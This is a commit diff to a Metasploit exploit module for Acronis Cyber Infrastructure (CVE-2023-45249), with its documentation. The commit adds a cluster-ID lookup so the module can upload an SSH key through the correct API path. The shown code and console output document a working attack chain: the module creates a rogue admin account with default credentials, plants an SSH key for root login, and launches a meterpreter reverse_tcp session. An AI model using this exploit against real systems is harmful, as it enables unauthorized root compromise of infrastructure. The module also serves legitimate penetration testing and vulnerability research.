Fixed cluster ID issue

documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md

@@ -149,6 +149,8 @@ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 [*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
 [*] Uploading SSH public key at the Acronis Admin Portal.
 [*] Authenticating with SSH private key.
 [*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
@@ -175,6 +177,8 @@ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 [*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
 [*] Uploading SSH public key at the Acronis Admin Portal.
 [*] Authenticating with SSH private key.
 [*] Executing Interactive SSH for generic/ssh/interact

modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

@@ -169,7 +169,7 @@ def do_sshlogin(ip, user, ssh_opts)
     return true
   end
 
-  # Login at the Acronis Cyber Infrastructure web portal
+  # login at the Acronis Cyber Infrastructure web portal
   def aci_login(name, pwd)
     post_data = {
       username: name.to_s,
@@ -188,8 +188,32 @@ def aci_login(name, pwd)
     return res&.code == 200
   end
 
-  # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
-  def upload_sshkey(sshkey)
+  # returns cluster id or nil if not found
+  def get_cluster_id
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'clusters')
+    })
+
+    return unless res&.code == 200
+    return unless res.body.include?('data') && res.body.include?('id')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['data'].each do |cluster|
+      return cluster['id'] unless cluster['id'].nil?
+    end
+  end
+
+  # upload the SSH public key using the cluster_id defined at the Acronis Cyber Infrastructure web portal
+  def upload_sshkey(sshkey, cluster_id)
     post_data = {
       key: sshkey.to_s,
       event:
@@ -209,7 +233,7 @@ def upload_sshkey(sshkey)
       'headers' => {
         'X-Requested-With' => 'XMLHttpRequest'
       },
-      'uri' => normalize_uri(target_uri.path, 'api', 'v2', '1', 'ssh-keys'),
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', cluster_id.to_s, 'ssh-keys'),
       'data' => post_data.to_s
     })
     return true if res&.code == 202 && res.body.include?('task_id')
@@ -223,7 +247,7 @@ def execute_command(cmd, _opts = {})
     @timeout = true
   end
 
-  # Return ACI version-release string or nil if not found
+  # return ACI version-release string or nil if not found
   def get_aci_version
     res = send_request_cgi({
       'method' => 'GET',
@@ -309,9 +333,14 @@ def exploit
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
+    # get cluster id to upload the SSH keys
+    print_status('Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.')
+    cluster_id = get_cluster_id
+    fail_with(Failure::NotFound, 'Can not find a cluster and retrieve the id.') if cluster_id.nil?
+
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key)
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key, cluster_id)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({